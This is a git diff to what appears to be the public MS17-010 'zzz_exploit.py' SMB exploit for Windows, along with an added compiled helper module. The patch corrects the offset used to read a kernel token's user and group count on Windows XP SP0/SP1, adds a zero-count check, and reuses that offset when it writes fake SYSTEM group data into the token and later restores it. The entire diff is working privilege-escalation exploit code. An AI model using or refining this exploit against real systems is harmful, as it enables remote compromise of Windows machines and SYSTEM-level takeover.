diff --git a/mysmb.pyc b/mysmb.pyc
new file mode 100644
index 0000000..c72fbe7
Binary files /dev/null and b/mysmb.pyc differ
diff --git a/zzz_exploit.py b/zzz_exploit.py
index e9f5996..41f81b8 100644
--- a/zzz_exploit.py
+++ b/zzz_exploit.py
@@ -867,15 +867,19 @@ def exploit(target, pipe_name):
 		# copy Token data for restoration
 		tokenData = read_data(conn, info, tokenAddr, 0x40*info['PTR_SIZE'])
 		
-		userAndGroupCount = unpack_from('<I', tokenData, info['TOKEN_USER_GROUP_CNT_OFFSET'])[0]
+
+		userAndGroupCountOffset = info['TOKEN_USER_GROUP_CNT_OFFSET']
+		userAndGroupCount = unpack_from('<I', tokenData, userAndGroupCountOffset)[0]
 		userAndGroupsAddr = unpack_from('<'+fmt, tokenData, info['TOKEN_USER_GROUP_ADDR_OFFSET'])[0]
 		# hack to fix XP SP0 and SP1
 		if info['os'] == 'WINXP' and info['arch'] == 'x86':
-			if userAndGroupCount > 4:
+			if userAndGroupCount > 4 or userAndGroupCount == 0: # check NULL too
 				print("Bad TOKEN offsets detected, performing workaround")
-				userAndGroupCount = unpack_from('<I', tokenData, info['TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1'])[0]
+				userAndGroupCountOffset = info['TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1']
+				userAndGroupCount = unpack_from('<I', tokenData, userAndGroupCountOffset)[0]
 				userAndGroupsAddr = unpack_from('<'+fmt, tokenData, info['TOKEN_USER_GROUP_ADDR_OFFSET_SP0_SP1'])[0]
 
+
 		print('userAndGroupCount: 0x{:x}'.format(userAndGroupCount))
 		print('userAndGroupsAddr: 0x{:x}'.format(userAndGroupsAddr))
 
@@ -883,7 +887,7 @@ def exploit(target, pipe_name):
 		# modify UserAndGroups info
 		fakeUserAndGroupCount, fakeUserAndGroups = create_fake_SYSTEM_UserAndGroups(conn, info, userAndGroupCount, userAndGroupsAddr)
 		if fakeUserAndGroupCount != userAndGroupCount:
-			write_data(conn, info, tokenAddr+info['TOKEN_USER_GROUP_CNT_OFFSET'], pack('<I', fakeUserAndGroupCount))
+			write_data(conn, info, tokenAddr+userAndGroupCountOffset, pack('<I', fakeUserAndGroupCount))
 		write_data(conn, info, userAndGroupsAddr, fakeUserAndGroups)
 	else:
 		# the target can use PsImperonateClient for impersonation (Windows 2008 and later)
@@ -907,7 +911,7 @@ def exploit(target, pipe_name):
 		userAndGroupsOffset = userAndGroupsAddr - tokenAddr
 		write_data(conn, info, userAndGroupsAddr, tokenData[userAndGroupsOffset:userAndGroupsOffset+len(fakeUserAndGroups)])
 		if fakeUserAndGroupCount != userAndGroupCount:
-			write_data(conn, info, tokenAddr+info['TOKEN_USER_GROUP_CNT_OFFSET'], pack('<I', userAndGroupCount))
+			write_data(conn, info, tokenAddr+userAndGroupCountOffset, pack('<I', userAndGroupCount))
 	else:
 		write_data(conn, info, secCtxAddr, secCtxData)